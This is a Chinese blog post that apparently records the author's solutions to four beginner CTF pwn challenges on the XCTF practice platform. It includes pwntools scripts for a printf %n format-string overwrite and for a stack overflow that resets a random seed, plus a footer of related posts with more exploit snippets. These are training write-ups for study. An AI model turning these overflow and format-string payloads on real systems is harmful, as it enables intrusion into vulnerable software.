pwn 攻防世界刷题记录

最新推荐文章于 2025-04-23 00:08:14 发布
最新推荐文章于 2025-04-23 00:08:14 发布
阅读量224 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_75234353/article/details/130762103
版权
文章详细介绍了四种利用编程漏洞进行攻击的方法,包括get_shell通过nc实现shell获取,hello_pwn中利用溢出修改内存地址,CGfsb中利用printf的%n特性,以及guess_num中操纵随机数种子以预测输出。每种方法都包含了源码分析、漏洞利用步骤和exp.py脚本示例,展示了安全漏洞被利用的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.get_shell

 运行就能getshell

直接nc

 2.hello_pwn

 a可溢出到b,再输入我们想要的值。

 0x601068-0x60106c=-4

这里我犹豫了下,到底是b上面的地址来减还是b的地址。

payload=b'A'*4+p64(1853186401)

 3.CGfsb

1.源码分析

 printf(s),直接%n

2.确定参数偏移量

 数下来为11,减一,偏移量为10。

3.exp.py

from pwn import *

context.log_level = "debug"

sh= remote('61.147.171.105',58350)
sh.recvuntil('please tell me your name:')
sh.sendline(b'1111')
pwn=0x0804A068
sh.recvuntil('leave your message please:')
payload =p32(pwn)+b'BBBB'+b'%10$n'

sh.sendline(payload)

sh.interactive()

 4.guess_num

1.源码分析

 v7可溢出到seed处,把seed的值变为1,这样每次的rand随机得的值都是一致的。

先来写段脚本

vim name.c
gcc name.c
ls
./a.out

 脚本内容

#include <stdio.h>
#include <stdlib.h>
int v6;
int main(void) 
{
srand(0);
   for(int i=0;i<15;i++)
	{
	   	
	  v6 = rand() % 6 + 1;
	  printf("%d,",v6);
	}
}

 可以看到得到的值为:2,5,4,2,6,2,5,1,4,2,3,2,3,2,6

而且每次运行都是一样的。

2.exp.py

from pwn import *
#io = process('./4')
context.log_level = "debug"

io= remote('61.147.171.105',59883)

io.recvuntil('Your name:')
payload=b'A'*32+p64(0)
io.sendline(payload)


a=[2,5,4,2,6,2,5,1,4,2]

for i in a:  
    num = str(i) 
    io.recvuntil('number:')
    io.sendline(num)

io.interactive()

 注:①覆盖seed的值,必须以p64()的形式发送过去

②io.interactive(),必须加上这行。我第一次写exp.py的时候没加,发现接收不了flag,我想这也许是和调用system函数有关,得进入交互模式。不然就像下图一样报错。

③发送猜的数据时,记得str(i)

 

pwn入门——starting(1)
qq_44302282的博客
05-05 376
level0 目来源:攻防世界—level0 链接:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5053&page=1 1、首先,执行基本步骤(前面已经说过了),看图 2、 接下来,打开64位的ida 3、在左边的函数窗口里面找到main函数,打开它,tab键可以切换反...
BUUCTF-PWN题记-3
weixin_44145820的博客
03-31 953
hitcontraining_heapcreator hitcontraining_heapcreator 考虑修改GOT表 在edit函数中可以溢出一个byte 这需要利用堆重叠的方法,因为free之后会置空,只能利用堆重叠进行重复分配 利用思路如下: 先申请三个heap,其中heap[0]的内容大小为8的奇数倍 使用edit溢出修改heap[1]的chunk的size,把heap[...
攻防世界PWN(一)
m0_53932372的博客
12-30 1663
cgpwn2 32bit,漏洞:栈溢出 这很简单,第一次输入参数“/bin/sh”到一个bss区域,第二次利用栈溢出getshell exp: from pwn import * io = remote('111.200.241.244',61742) sys_addr = 0x08048420 io.recvuntil("your name\n") io.sendline("/bin/sh") bin_sh_addr =0x0804A080 io.recvuntil("leave some messag
攻防世界pwn笔记(实时更新)
zzh258369的博客
02-27 567
学了点逆向又来接触点pwn方面的,现在学习效率有点低下,需要再不断提高Pwn是指攻击者通过漏洞利用技术,获取目标系统或程序的控制权,进而执行任意代码、窃取数据等恶意操作,以达到破坏系统安全、获取敏感信息等目的的行为过程。比如攻击者利用软件中的缓冲区溢出漏洞,改写程序的执行流程,让程序执行攻击者预先准备好的恶意代码。具体相关描述后面遇到会详细解释作为引导模式的第一,一看难度竟然是7,一下子就慌了,但是事实上这道很简单下载好后放入虚拟机里,先简单逆向分析一下,没发现任何东西其实就简单linux指令。
PWN入门——BUUCTF(1-4)
ChenD的学习笔记
09-23 797
最近为了学校组织的ctf比赛才开始接触pwn的刚刚做了十多道现在来记一下,记完了接着学后面贼难的内容!
BUUCTF PWN 1-15
农夫果园好好喝的博客
08-21 2403
经典栈溢出漏洞。
pwn题记(buuctf1-6)
最新发布
xcellencw的博客
04-23 691
checksecIDA64打开,shift+F12查看有system函数和/bin/sh如何查看他们的位置呢?两种点击fun函数进去 /bin/sh 0x40118A以下才是它libc中的地址(动态),而用ROPgadget --binary rip --string '/bin/sh'查的是静态地址填充数据如何算呢?这里推荐①cyclic 200,先创建200个数据;②pwndbg > run ,在pwndbg中运行程序;运行到如下图所示。
Bugku CTF梳理
lin的博客
04-10 1464
大佬的题记:https://blog.youkuaiyun.com/mcmuyanga 1.CTF常见型 CTF比赛通常包含的目类型有七种,包括MISC、PPC、CRYPTO、PWN、REVERSE、WEB、STEGA。 MISC(Miscellaneous)类型,即安全杂项,目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 PPC(Professionally Program Coder)类型,即编程类目,目涉及到编程算法,相比ACM较为容易。 CRYPTO(Cryptography)
写一下自已对ctf的了解,以便日后自已需要
m0_50987622的博客
11-07 6177
11.7 本人ctf小白,参加比赛基本处于摸鱼状态,也没有系统了解过ctf以及做过相关的实践和练习,但是,对这一块比较感兴趣,所以,只能说,在学习中,就跟我当初学makefile一样,做下记,写点自已觉得对自已有用的东西,大概这样。 ctf总共分为五部分,misc杂项,crypto解密加密,pwn攻破设备、系统,reverse逆向渗透,web网络安全。500pt的都很难。 首先,建立在你对前后端足够了解的基础上。 web安全就是黑服务器,pwn就是黑设备黑系统,至于怎么黑,仁者见仁智者见智,取决
BUUCTF PWN题记 (未完待续)
qq_41071646的博客
08-01 2075
最近找了一个新的CTF比赛平台 但是不知道为啥pwn的服务器总是连不上, 所以到时候还是直接本地打 默认2.23 so 如果 有高版本的话 我再切换,,, 逆向的话 先等等吧,,,先不。。等有空了再 第一 连上就有flag的pwn 直接 运行就有权限,。 第二 RIP覆盖一下 这个没有任何保护 直接 覆盖rip就可以了 from pwn import * conte...
buuctf——pwn之旅(持续更新)
qq_42988973的博客
12-16 637
buuctf-pwn 的一些wp
Pwn题记(不停更新)
qq_66013948的博客
06-23 455
​ 发现了个事儿,for循环会执行两次,所以这里采用第一次不溢出,通过格式化字符串漏洞对Canary的值进行泄露,之后就可以在合适的地方填入canary的值来绕过canary保护了。​ 之后就是具体进行溢出了,计算溢出的长度也比较简单,这里直接上答案吧,116字节,不过,第100到104为canary的值。​ 根据这俩进行计算,可得到偏移,结果是0x7c/4=31。​ 除了NX之外,似乎就只有 Canary了。​ 因此,思路就很明确了。
PWN题记(1)--ciscn_2019_n_5
小心信科理化声
05-10 384
这是第一篇的题记,从ret2text开始起 0x1 程序分析 先checksec 一下 64位的小端序,NX没开启,妥妥的写shellcode 拖入IDA中查看一下 main函数如下 可以看到gets(text)有明显的溢出 然后还可以看到关键的read函数,可以做libc泄露用,先留着 然后查找一下有没有能用到的system函数和binsh 无system函数 估计也没有binsh了 咋办呢>? 看一下有没有可读可写可执行的字段呢? 看看这里的两个变量:name\text 存在!
NSSCTF PWN方向题记
CyhStyrl的博客
04-03 893
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
pwn入门——starting
qq_44302282的博客
05-04 1784
运行就能拿到shell呢,真的 目来源:攻防世界------运行就能拿到shell呢,真的 链接:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5049&page=1 先从最简单的入手(虽然我先的不是这道,emmmm) (作为小白,刚开始的这些步骤我真的不知道,所以我...
我又pwn了 ——篇 ciscn_s_3
m0_64195960的博客
08-08 654
ret2csu&SROP
二进制的保护机制
weixin_30872671的博客
05-29 301
这里主要讲的是CTF中linux下的ELF二进制文件的保护机制。在linux中有一个脚本checksec命令可以查看当前二进制文件的保护机制。任意安装一款gdb插件都会把checksec脚本包含进来。 在gdb中执行: gdb> checksec test Canary : No NX ...
pwnnum42---ret2libc(不容易)
tbsqigongzi的博客
05-02 1199
BUUCTF-PWN-pwn2_sctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 atoi会将一个字符串并转化为有符号整形(signed int),而我们只需要输入-1,即可绕过if(v2>32),使read函数读入非常大的数,造成栈溢出,查看一下程序,发
攻防世界pwn pwn-100
01-18
### 关于攻防世界PWN-100目的解答 #### 解决方案概述 对于攻防世界PWN-100目,通常涉及的是基础的缓冲区溢出攻击。这类目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术包括但不限于返回导向编程(Return-Oriented Programming, ROP)、重定向到已知位置的shellcode执行(ret2shellcode)或是利用动态链接库中的函数实现系统命令调用(ret2libc)[^1]。 #### 技术细节 当面对没有启用地址空间布局随机化(ASLR)且未开启不可执行堆栈(NX bit off)的情况时,可以直接采用`ret2shellcode`的方式解决问。此方法要求选手能够找到足够的空间放置自定义的shellcode,并通过控制EIP指向这段代码来完成最终的目标——通常是打开一个远程shell连接给攻击者[^3]。 如果遇到开启了NX位但是禁用了位置独立可执行文件(PIE),那么可以考虑使用`ret2libc`策略。这种方法依赖于将返回地址设置为标准C库(glibc)内的某个有用功能的位置,比如system()函数,从而间接地触发所需的恶意操作而无需注入新的机器码片段。 针对具体环境下的不同情况,还需要掌握诸如IDA Pro这样的反汇编工具来进行二进制分析工作;同时熟悉GDB调试技巧以便更好地理解程序内部逻辑并定位潜在的安全漏洞所在之处。 ```python from pwn import * # 连接到远程服务 conn = remote('challenge.ctf.games', PORT) # 发送payload前先接收初始消息 print(conn.recvline()) # 构造payload offset = 64 # 假设偏移量为64字节 junk = b'A' * offset return_address = pack('<I', 0xdeadbeef) # 替换为目标地址 exploit_payload = junk + return_address # 发送payload conn.send(exploit_payload) # 接收响应数据 result = conn.recvall() print(result.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wbxlzd

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值